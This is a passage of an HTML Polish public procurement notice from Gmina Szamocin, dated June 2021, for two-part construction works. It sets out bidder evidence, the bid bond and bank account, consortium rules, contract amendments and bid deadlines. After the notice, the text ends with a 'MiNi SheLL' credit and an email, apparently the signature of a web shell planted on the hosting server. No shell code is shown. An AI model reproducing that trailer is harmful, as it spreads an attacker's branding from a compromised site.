prawnym pozwalają uprawnienia budowlane w tej specjalności, co potwierdzą w wykazie osób zdolnych do realizacji zamówienia.<br/>3.W celu potwierdzenia spełnienia warunków udziału w postępowaniu, wykonawca może polegać na potencjale podmiotu udostępniającego zasoby na zasadach opisanych w art. 118–123 ustawy Pzp. Podmiot, na potencjał którego wykonawca powołuje się w celu wykazania spełnienia warunków udziału w postępowaniu, nie może podlegać wykluczeniu na podstawie art. 108 ust. 1 oraz art. 109 ust. 1 pkt 4 ustawy Pzp.<br/>4.Jeżeli zdolności techniczne lub zawodowe, sytuacja ekonomiczna lub finansowa podmiotu udostępniającego zasoby nie potwierdzają spełniania przez wykonawcę warunków udziału w postępowaniu lub zachodzą wobec tego podmiotu podstawy wykluczenia, Zamawiający żąda, aby wykonawca w terminie określonym przez Zamawiającego zastąpił ten podmiot innym podmiotem lub podmiotami albo wykazał, że samodzielnie spełnia warunki udziału w postępowaniu.<br/>5.Wykonawca nie może, po upływie terminu składania ofert, powoływać się na zdolności lub sytuację podmiotów udostępniających zasoby, jeżeli na etapie składania ofert nie polegał on w danym zakresie na zdolnościach lub sytuacji podmiotów udostępniających zasoby.<br/>6.Podmiot, który zobowiązał się do udostępnienia zasobów, odpowiada solidarnie z wykonawcą, który polega na jego sytuacji finansowej lub ekonomicznej, za szkodę poniesioną przez zamawiającego powstałą wskutek nieudostępnienia tych zasobów, chyba że za nieudostępnienie zasobów podmiot ten nie ponosi winy. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">1.Podmiotowe środki dowodowe (aktualne na dzień złożenia) składane na wezwanie Zamawiającego( zgodnie z art. 274 ust. 1 ustawy Pzp ) przez wykonawcę, którego oferta została najwyżej oceniona, w wyznaczonym terminie, nie krótszym niż 5 dni.<br/>1) W celu potwierdzenia braku podstaw wykluczenia wykonawcy z udziału w postępowaniu o udzielenie zamówienia publicznego, Zamawiający może żądać następujących podmiotowych środków dowodowych:<br/>a) odpisu lub informacji z Krajowego Rejestru Sądowego lub z Centralnej Ewidencji i Informacji o Działalności Gospodarczej, w zakresie art. 109 ust. 1 pkt 4 ustawy, wystawionych nie wcześniej niż 3 miesiące przed jej złożeniem, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji,<br/>b) oświadczenia o braku przynależności do grupy kapitałowej ( wg załącznika Nr 3 ). Zamawiający żąda od wykonawcy, który na potwierdzenie spełniania warunków udziału w postępowaniu, polega na zdolnościach lub sytuacji innych podmiotów, przedstawienia w odniesieniu do tych podmiotów dokumentów wymienionych w pkt. 1 ppkt. 1 lit. a) i b).</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">1.Podmiotowe środki dowodowe (aktualne na dzień złożenia) składane na wezwanie Zamawiającego( zgodnie z art. 274 ust. 1 ustawy Pzp ) przez wykonawcę, którego oferta została najwyżej oceniona, w wyznaczonym terminie, nie krótszym niż 5 dni.<br/>2) W celu potwierdzenia spełniania przez wykonawcę warunków udziału w postępowaniu dotyczących zdolności technicznej lub zawodowej, sytuacji finansowej, Zamawiający żąda następujących podmiotowych środków dowodowych: <br/>a)wykazu robót budowlanych wykonanych nie wcześniej niż w okresie ostatnich 5 lat, a jeżeli okres prowadzenia działalności jest krótszy –w tym okresie, wraz z podaniem ich rodzaju, wartości, daty i miejsca wykonania oraz podmiotów, na rzecz których roboty te zostały wykonane, oraz załączeniem dowodów określających, czy te roboty budowlane zostały wykonane należycie, przy czym dowodami, o których mowa, są referencje bądź inne dokumenty sporządzone przez podmiot, na rzecz którego roboty budowlane zostały wykonane, a jeżeli wykonawca z przyczyn niezależnych od niego nie jest w stanie uzyskać tych dokumentów –inne odpowiednie dokumenty( wg załącznika Nr 5 ),<br/>b)wykazu osób, skierowanych przez wykonawcę do realizacji zamówienia publicznego, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, uprawnień, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia publicznego, a także zakresu wykonywanych przez nie czynności oraz informacją o podstawie do dysponowania tymi osobami( wg załącznika Nr 6 ),<br/>c)informacji banku lub spółdzielczej kasy oszczędnościowo-kredytowej potwierdzającej wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, w okresie nie wcześniejszym niż3 miesiące przed jej złożeniem.</span> </h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> Nie dotyczy. <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> Zawarto w SWZ. <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.4.1) Informacje dotyczące wadium: </h3> 1.Wykonawca przystępujący do postępowania jest zobowiązany, przed upływem terminu składania ofert, wnieść wadium w kwocie:<br/>a) Dla części Nr 1 -2000,00 zł(słownie: dwatysiące zł).<br/>b) Dla części Nr 2 -2000,00 zł(słownie: dwatysiące zł).<br/>2.Wadium musi obejmować pełen okres związania ofertą <br/>3.Wadium może być wniesione w jednej lub kilku formach wskazanych w art. 97 ust. 7 ustawy Pzp.<br/>4. Wadium wnoszone w pieniądzu należy wpłacić przelewem na rachunek bankowy : Bank : Bank Spółdzielczy Nr rachunku : 39 8945 0002 3900 0101 2000 0020<br/>Wadium musi wpłynąć na wskazany rachunek bankowy Zamawiającego najpóźniej przed upływem terminu składania ofert (decyduje data wpływu na rachunek bankowy Zamawiającego).<br/>5.Wadium wnoszone w poręczeniach lub gwarancjach należy załączyć do oferty w oryginale w postaci dokumentu elektronicznego podpisanego kwalifikowanym podpisem elektronicznym przez wystawcę dokumentu i powinno zawierać następujące elementy:<br/>-nazwę dającego zlecenie (wykonawcy), beneficjenta gwarancji (Zamawiającego), gwaranta/poręczyciela oraz wskazanie ich siedzib. Beneficjentem wskazanym w gwarancji lub poręczeniu musi być Gmina Szamocin,<br/>-określenie wierzytelności, która ma być zabezpieczona gwarancją/poręczeniem,<br/>-kwotę gwarancji/poręczenia,<br/>-termin ważności gwarancji/poręczenia,<br/>-zobowiązanie gwaranta do zapłacenia kwoty gwarancji/poręczenia bezwarunkowo, na pierwsze pisemne żądanie zamawiającego, w sytuacjach określonych w art. 98 ust. 6 ustawy Pzp.<br/>6.Wprzypadku, gdy wykonawca nie wniósł wadium lub wniósł w sposób nieprawidłowy lub nie utrzymywał wadium nieprzerwanie do upływu terminu związania ofertą lub złożył wniosek o zwrot wadium, w przypadku o którym mowa w art. 98 ust. 2 pkt 3 ustawy Pzp, Zamawiający odrzuci ofertę na podstawie art. 226 ust. 1 pkt 14 ustawy Pzp.<br/>7.Zamawiający dokona zwrotu wadium na zasadach określonych wart. 98 ust. 1–5 ustawy Pzp.<br/>8.Zamawiający zatrzymuje wadium wraz z odsetkami na podstawie art. 98 ust. 6 ustawy Pzp.<br/>9.Złożenie wniosku o zwrot wadium, o którym mowa w art. 98 ust. 2 ustawy Pzp, powoduje rozwiązanie stosunku prawnego z wykonawcą wraz z utratą przez niego prawa do korzystania ze środków ochrony prawnej. <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 7.Wykonawcy wspólnie ubiegający się o udzielenie zamówienia muszą wykazać, że:<br/>1)wspólnie muszą wykazać, że spełniają warunki udziału w postępowaniu,<br/>2)w stosunku do żadnego z nich nie zachodzi jakakolwiek podstawa do wykluczenia z postępowania na podstawie art. 108 ust. 1 oraz art. 109 ust. 1 pkt. 4 ustawy Pzp,<br/>3)ponoszą solidarną odpowiedzialność za niewykonanie lub nienależyte wykonanie zobowiązania,<br/>4)muszą ustanowić pełnomocnika wykonawców występujących wspólnie do reprezentowania ich w postępowaniu o udzielenie zamówienia publicznego albo reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia. Pełnomocnictwo musi mieć formę pisemną lub kopię potwierdzona przez notariusza,<br/>5)przed zawarciem umowy o niniejsze zamówienie publiczne, jeżeli oferta konsorcjum zostanie wybrana jako najkorzystniejsza, Zamawiający wezwie do przedstawienia umowy regulującej współpracę tych wykonawców.<br/>6)Przepisy dotyczące wykonawcy stosuje się odpowiednio do wykonawców wspólnie ubiegających się o udzielenie zamówienia.<br/>7)Wykonawcy wspólnie ubiegający się o udzielenie zamówienia mają obowiązek dołączyć do oferty oświadczenie, z którego będzie wynikać, które roboty budowlane wykonają poszczególni wykonawcy. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 1. Oprócz okoliczności i warunków dopuszczalnych zmian treści zawartej umowy <br/>określonych w SWZ, Zamawiający przewiduje możliwość dokonania zmiany w <br/>zawartej umowie w niżej wymienionych przypadkach: <br/>1) Zamawiający dopuszcza przedłużenie terminu wykonania przedmiotu umowy o <br/>czas opóźnienia, jeżeli takie opóźnienie ma lub będzie miało wpływ na wykonanie <br/>umowy w przypadku utrudnień spowodowanych stanem epidemii w kraju, które miały <br/>wpływ na: <br/>0dostęp do zakupu materiałów budowlanych, transport materiałów,ograniczony czas pracy pracowników, przemieszczanie się ludzi i sprzętu, wykonanie części robót przez podwykonawców, jeżeli opóźnienia były <br/>spowodowane okolicznościami, o których mowa w niniejszym punkcie. <br/>2) W uzasadnionych przypadkach Zamawiający może dopuścić wprowadzanie zmian <br/>w stosunku do dokumentacji projektowej, w trakcie prowadzenia inwestycji w <br/>zakresie technologii wykonania elementów robót. Dopuszcza się je tylko, gdy <br/>proponowane przez Inżyniera lub Zamawiającego rozwiązanie jest lepsze <br/>funkcjonalnie od tego, jakie przewiduje projekt i nie prowadzi do zmiany <br/>wynagrodzenia Wykonawcy o więcej niż 5% należnego wynagrodzenia. <br/>3) Zamawiający dopuszcza inne zmiany postanowień umowy, takie jak: <br/>a) zmiany technologii wykonywania robót i/lub rodzaju materiałów, z których będą <br/>wykonane roboty budowlane, w przypadku w szczególności zaprzestania produkcji <br/>materiału bądź wycofania i wprowadzenia przez producenta materiału o parametrach <br/>i cechach użytkowych lepszych lub jakościowo wyższych lub technologicznie 30<br/>nowszych albo właściwszych w zaistniałej sytuacji. Zmiana rodzaju materiałów <br/>wymaga pisemnej akceptacji Zamawiającego, uzyskanie której wymaga <br/>przedstawienia przez Wykonawcę szczegółowego uzasadnienia zmiany wraz z <br/>pisemnym potwierdzeniem producenta parametrów nowych materiałów. Zmiana <br/>rodzaju materiałów i/lub technologii realizacji, jeśli nie powoduje zmiany <br/>wynagrodzenia nie wymaga sporządzenia aneksu do umowy, <br/>b) zmiana umowy w zakresie podwykonawców, za uprzednią zgodą Zamawiającego, <br/>tj. możliwe powierzenie podwykonawcom innej części robót niż wskazana w ofercie <br/>Wykonawcy, rezygnacja z planowanego podwykonawstwa, a także możliwa zmiana <br/>podwykonawcy na etapie realizacji robót, o ile nie sprzeciwia się to postanowieniom <br/>SWZ, <br/>c) zmiana sposobu rozliczania umowy ( inne terminy rozliczania lub za inne części <br/>wykonanych robót ) lub dokonywanie płatności na rzecz Wykonawcy na skutek np. <br/>zmian zawartej przez Zamawiającego umowy o dofinansowanie przedsięwzięcia, <br/>d) zmiana wynikająca z przejęcia zobowiązań przez Zamawiającego względem <br/>podwykonawców Wykonawcy. <br/>2. Przewiduje się możliwość dokonania zmiany Wykonawcy, z którym zawarto <br/>umowę, i którego ma zastąpić nowy Wykonawca w wyniku połączenia, podziału, <br/>przekształcenia, lub nabycia dotychczasowego Wykonawcy lub jego <br/>przedsiębiorstwa, o ile nowy Wykonawca spełnia warunki udziału w postępowaniu, <br/>nie zachodzą wobec niego podstawy wykluczenia oraz nie pociąga to za sobą innych <br/>istotnych zmian umowy, <br/>3. W przypadku ograniczenia zakresu przedmiotu umowy, ale nie więcej niż o 10%, <br/>wynagrodzenie przysługujące Wykonawcy zostanie pomniejszone, przy czym <br/>Zamawiający zapłaci za wszystkie udokumentowane poniesione już koszty tego <br/>zakresu rzeczowego.<br/>4. Jeżeli w toku realizacji przedmiotu umowy Strony ustalą wykonanie robót <br/>zamiennych, to roboty pierwotnie planowane zostaną wyłączone z zakresu <br/>podstawowego przedmiotu umowy na podstawie zakresu zmian określonych w <br/>protokołach konieczności oraz na podstawie cen jednostkowych i czynników <br/>kalkulacyjnych określonych w kosztorysie ofertowym Wykonawcy, a w przypadku <br/>braku takich elementów rozliczeniowych, podstawą będą powszechnie stosowane <br/>katalogi KNR i ceny rynku lokalnego. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2021-07-06 11:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://przetargi.gminaszamocin.pl/</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2021-07-06 11:15</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2021-08-03</span></h3></main><footer hidden><table style="border-top: 1px solid black; width:100%"><tr><td>2021-06-21 Biuletyn Zamówień Publicznych</td><td style="text-align:right">Ogłoszenie o zamówieniu - Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy - Roboty budowlane</td></tr></table></footer>

Creat By MiNi SheLL
Email: jattceo@gmail.com